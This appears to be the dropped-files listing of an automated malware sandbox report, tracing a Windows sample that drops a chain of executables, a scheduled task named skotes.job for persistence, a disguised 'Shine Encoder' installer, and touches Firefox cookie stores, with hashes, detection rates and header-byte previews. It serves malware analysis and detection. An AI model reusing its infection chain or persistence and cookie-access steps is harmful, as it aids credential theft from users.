Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................l.......^...............Rich............PE..L.....C (.........!.........................0....@..........................`......B}...............................'.......$..P....@..H....................P..<.......T...............................................\|............................text............................... ..`.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcp71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcr71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3766874
Entropy (8bit):	6.577509718348026
Encrypted:	false
SSDEEP:	49152:1QeEr1e0ZaFnh+k7jsIJT/Kw0TA9CcvD7irKV3JV7Dzy:1QeExTIFJTV0TAccvD7imV5tzy
MD5:	F978D5EBA9977AF32374DCB616CB63FE
SHA1:	D45C19F173D68FB11DD1C358B42B135E634EBE4E
SHA-256:	2921409FA28850E3C1874AE52A25B00F93961C278CF131F11F67CEE89061F7C8
SHA-512:	0075C468DB47B8F92B9D329089A61FD554C5F7FC374BE34FCFF8F925DBA334BA41BAB09303E16D32607597AF5E2636203DB312C412FC68B3BEE60A799620FE9F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..L............................8.............@...........................9......c:.................................................P...............................................................................4............................text............................... ..`.rdata..T...........................@..@.data....c...0...0..................@....rsrc................<..............@..@.pqr7....$......Z"...X..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\sqlite3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\is-QG72D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2555217
Entropy (8bit):	6.364158193929765
Encrypted:	false
SSDEEP:	49152:gdrGT9oY0SAQ4+YI1Qb1oWGxblxZa0o85f8Y:gFGTv1QtGxHZabc
MD5:	B4E05FF6565CA56723B9386F8EF4FD09
SHA1:	EAEFF43281082B69A3693E42B1CB15827DC7C928
SHA-256:	AABE6156E7B848A7B70117F2ED1BD8002FE57435F28E72CD602B87AA00681E9E
SHA-512:	CC7B6E93F0B5B0B4D3FB80816DF050AC41E959B3ED1C45B777856893478D4CEB88569B679649C641DC92218F4CB6A18F609518CBBB5A01F379A65B6716916D2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...4..\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..D...................................................0&.....................D.%.@.....&......................text...(.$.......$................. ..`.itext...&....$..(....$............. ..`.data...4Z....$..\....$.............@....bss.....q...@%..........................idata...5....%..6....%.............@....didata.......&......R%.............@....edata........&......\%.............@..@.tls....D.... &..........................rdata..]....0&......^%.............@..@.rsrc....D...@&..D...`%.............@..@..............'.......&.............@..@........................................................

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	InnoSetup Log Shine Encoder, version 0x418, 9167 bytes, 701188\37\user\376, C:\Users\user\AppData\Local\Shine Encoder
Category:	dropped
Size (bytes):	9167
Entropy (8bit):	3.8740424549775203
Encrypted:	false
SSDEEP:	96:A2O1gWH4I84pq8SncBE98gYl0J7PCzbcuJlEeA4MZAe2LzqinsD03HAfNF5JiRqV:A2O1gWHXtpqXJ7obP4eSmWpWCH3
MD5:	5642B8121B2B7DBC05FA6460D30E2290
SHA1:	985F34D16EF3C62D61D0D65C592E8B3FCFAFF464
SHA-256:	E7FA45B508D4FDC4C3A26199299FDFC35027B4E0A07C9F0EFAC6E4F71DB92706
SHA-512:	8A28AC2C4A24776ACBE440EF6E2EEBF27FCEFF587E436C5D64A8404570C158A0D302821CA1B0414E041FF063723B11DB41BB0D45DEA96156907B9C2A46C3B218
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................Shine Encoder...................................................................................................................Shine Encoder............................................................................................................................#..!.................................................................................................................D..........Vx...............7.0.1.1.8.8......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.S.h.i.n.e. .E.n.c.o.d.e.r. .1...4...3....................... ..............IFPS....$........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TPASSWORDEDIT....TPASSWOR

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2555217
Entropy (8bit):	6.364158193929765
Encrypted:	false
SSDEEP:	49152:gdrGT9oY0SAQ4+YI1Qb1oWGxblxZa0o85f8Y:gFGTv1QtGxHZabc
MD5:	B4E05FF6565CA56723B9386F8EF4FD09
SHA1:	EAEFF43281082B69A3693E42B1CB15827DC7C928
SHA-256:	AABE6156E7B848A7B70117F2ED1BD8002FE57435F28E72CD602B87AA00681E9E
SHA-512:	CC7B6E93F0B5B0B4D3FB80816DF050AC41E959B3ED1C45B777856893478D4CEB88569B679649C641DC92218F4CB6A18F609518CBBB5A01F379A65B6716916D2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...4..\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..D...................................................0&.....................D.%.@.....&......................text...(.$.......$................. ..`.itext...&....$..(....$............. ..`.data...4Z....$..\....$.............@....bss.....q...@%..........................idata...5....%..6....%.............@....didata.......&......R%.............@....edata........&......\%.............@..@.tls....D.... &..........................rdata..]....0&......^%.............@..@.rsrc....D...@&..D...`%.............@..@..............'.......&.............@..@........................................................

C:\Users\user\AppData\Local\Temp\1006431001\stories.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6233398
Entropy (8bit):	7.946426242317142
Encrypted:	false
SSDEEP:	98304:PX4wRX+gNnYLzYhrMfgiBB3owncvnuOK+VWUhFh6J3GB4VVPYhpYEFyazx1G0:vnRX+gNnYvgHycaYwTVVPQyaB
MD5:	CBB34D95217826F4AD877E7E7A46B69C
SHA1:	D903374F9236B135CF42C4A573B5CD33DF9074BD
SHA-256:	707B321C42FBAA91CF41A9B41C85F3B56C7326CB32F40FC495F17DF83B21CBED
SHA-512:	EEC4382387A1C2223DA3350A28EC250CFA6DD2EDB7EDA6C516EE32FC784638F23005E992AF337E9D87878FE2049B0A41DF7F1C65C9D717D6A8771D7833BE3F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...3..\.................j...........~............@.......................................@......@...................`.......@...........F...........................................................................B..@....P.......................text....P.......R.................. ..`.itext..h....p.......V.............. ..`.data....7.......8...n..............@....bss....lg...............................idata.......@......................@....didata......P......................@....edata.......`......................@..@.tls.........p...........................rdata..]...........................@..@.rsrc....F.......F..................@..@....................................@..@........................................................

C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1848320
Entropy (8bit):	7.94769563102028
Encrypted:	false
SSDEEP:	49152:fg85eHbF1uBBQiFJXjM9uoihYuf2mQIt:fbqmr/lj9EQPQI
MD5:	EC1204EE4264E2DDE75A9BADC5023363
SHA1:	5E0432D8B0071D009E9AD29F6C5C9358B847CDF5
SHA-256:	67B3C01AD9D9162E83214BE4A8F2F1979D735B257A7D680325C64544E4FC98BD
SHA-512:	122A74D6F944FDD025C283C81EC2547A537F7AEEC07C1C94E5FB97D44EDF75995724AF0CD62C454CC33DDDE44F20D5ED92254E55E8ACEB82150933B6DE4ED189
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....4g.............................`I...........@...........................I......3....@.................................T@..h............................A...................................................................................... . . .......J..................@....rsrc .....0.......Z..............@....idata .....@.......Z..............@... .P*..P.......\..............@...inlhqcme....../......^..............@...dbbpexbo.....PI.....................@....taggant.0...`I.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1812480
Entropy (8bit):	7.946782640864916
Encrypted:	false
SSDEEP:	24576:iyO0WNSipzzzKsELqntGnCp3o4J1LqwbbVtFMDjJnucPk5XJt6mtJC:i0e746tyoEwOucPk5XJ8
MD5:	A8916B1DB51981824CF0545DF6864FB9
SHA1:	1FAEA8FAF266FD74109256096CC1DCE4ACB9298B
SHA-256:	BC6CE7042E0B92A139C10C803493ADC1C87BDDB4FE2F9F44A9F2A052833960E8
SHA-512:	DF9BA0E339EB25F2CFFE7BD17D9B50A6407F89F8580C5E1F5F5696308780EE22CBD8C3D7D4A060A4FAB9036B4964BA66B2C5E9FF02E93B2DD870CF6F7B4BF5ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......i...........@...........................i......"....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...ylgrvzmt.....`O......v..............@...sdrnsjgb.....pi.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2790400
Entropy (8bit):	6.4545699688386335
Encrypted:	false
SSDEEP:	24576:dsqgxhrTzjs6uvO9DMrBYTCQq3mkzfpuuuEBJksrg89xEfVG6TWXD7gLjYkUr5zN:Ajs7O99mHF4Orziq5KPLTovBS6mLXjt
MD5:	273688D08CE0EDD09E29A0A0D2FEAF6D
SHA1:	2A08F6B1CBEC6606E25C1450F7A3E833C107DF85
SHA-256:	ACC8F0812BA6C78BA173A5B3A714AA5802A78D907DD5B8BFE8E2293EF4946AB7
SHA-512:	DE51B00379DB99C7FD93FD3D3D6EB823553E9730D41A1F9DF462A7E4E83A93BAF2CF3E10BC77389F45094B202841726F87630B71BCE18820972842563420B5B2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...fnateuls.@......4..:..............@...eutlwerm. ..........n.............@....taggant.@....+.."...r.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsGDHIDHIEGI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.645060214025585
Encrypted:	false
SSDEEP:	49152:BwQwirsf7bu1+zubKQi4eiLyqhATx7u6B:BMzbGAubK37iLPhGJ
MD5:	314E0BB891690BF44AB39895FC0AC49F
SHA1:	F442DACE32225260D9BF319B81CBB26F8F87D1AD
SHA-256:	E98530780ADCF430B4D68357915856F30F43FCA0209493565B80BF09FBCF8E66
SHA-512:	07CE29E88EF94FFAD9A95EF0271069FCF750E181377B53DEE81499035D24621F1B7C626986C042F0987C54245C2D18E48EF1E01C739077C8B22507A8C7904404
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....}>2...@.................................W...k.......H....................l1.............................tl1..................................................... . ............................@....rsrc...H...........................@....idata ............................@...edncfhzz..........................@...ywkrkdul.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1006431001\stories.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2532352
Entropy (8bit):	6.380215427527552
Encrypted:	false
SSDEEP:	49152:IdrGT9oY0SAQ4+YI1Qb1oWGxblxZa0o85f8:IFGTv1QtGxHZab
MD5:	D39963C7160D31F9EF536BECF3004498
SHA1:	9485F170D679B63B6EAEF023C2459D50E665DCD6
SHA-256:	70CDFB9222CFE63DC84CCB91FC76ED489E3A8AB62876DD0EAF57659D6D9D0ADC
SHA-512:	B5B5CD3623AF8BE77979D51B6F7A19504F565435A256C2B5B908FACA335ED1A330131C5B8BF845B290FB980C778434AA7ADDBCBA3043C4421F7C9343344FDAD5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...4..\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..D...................................................0&.....................D.%.@.....&......................text...(.$.......$................. ..`.itext...&....$..(....$............. ..`.data...4Z....$..\....$.............@....bss.....q...@%..........................idata...5....%..6....%.............@....didata.......&......R%.............@....edata........&......\%.............@..@.tls....D.... &..........................rdata..]....0&......^%.............@..@.rsrc....D...@&..D...`%.............@..@..............'.......&.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsGDHIDHIEGI.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.645060214025585
Encrypted:	false
SSDEEP:	49152:BwQwirsf7bu1+zubKQi4eiLyqhATx7u6B:BMzbGAubK37iLPhGJ
MD5:	314E0BB891690BF44AB39895FC0AC49F
SHA1:	F442DACE32225260D9BF319B81CBB26F8F87D1AD
SHA-256:	E98530780ADCF430B4D68357915856F30F43FCA0209493565B80BF09FBCF8E66
SHA-512:	07CE29E88EF94FFAD9A95EF0271069FCF750E181377B53DEE81499035D24621F1B7C626986C042F0987C54245C2D18E48EF1E01C739077C8B22507A8C7904404
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....}>2...@.................................W...k.......H....................l1.............................tl1..................................................... . ............................@....rsrc...H...........................@....idata ............................@...edncfhzz..........................@...ywkrkdul.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsGDHIDHIEGI.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.391558472844732
Encrypted:	false
SSDEEP:	6:LDXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lB601ut0:LDf2RKQ1CGAFAjzvYRQVB61t0
MD5:	A71968CA2FA3E5E3D18C53525608A75D
SHA1:	5A517E9E113B126BDC1E8A2CDD35C65D63059825
SHA-256:	CE959C526618AB2027634573919B33E8F2734CC1B7D1F7293C90C7C1A5313341
SHA-512:	3B9AF402AD029B84F035F012ED229780564A1F092BF7CCA59A0FA70E8D2A8B3F8A8936C244CAAD46B6B5D1B3A22F86B45B274C4D84CAFCD3FD95DDE9AC50C6AC
Malicious:	false
Reputation:	unknown
Preview:	....fnv.w..J..X..].1F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	464328
Entropy (8bit):	5.074669864961383
Encrypted:	false
SSDEEP:	6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
MD5:	CB0701D474D57F8C8E2F569161CE0349
SHA1:	4BE2E0C148DED16354E7A91FE721644897C5503C
SHA-256:	AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
SHA-512:	BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
Malicious:	false
Reputation:	unknown
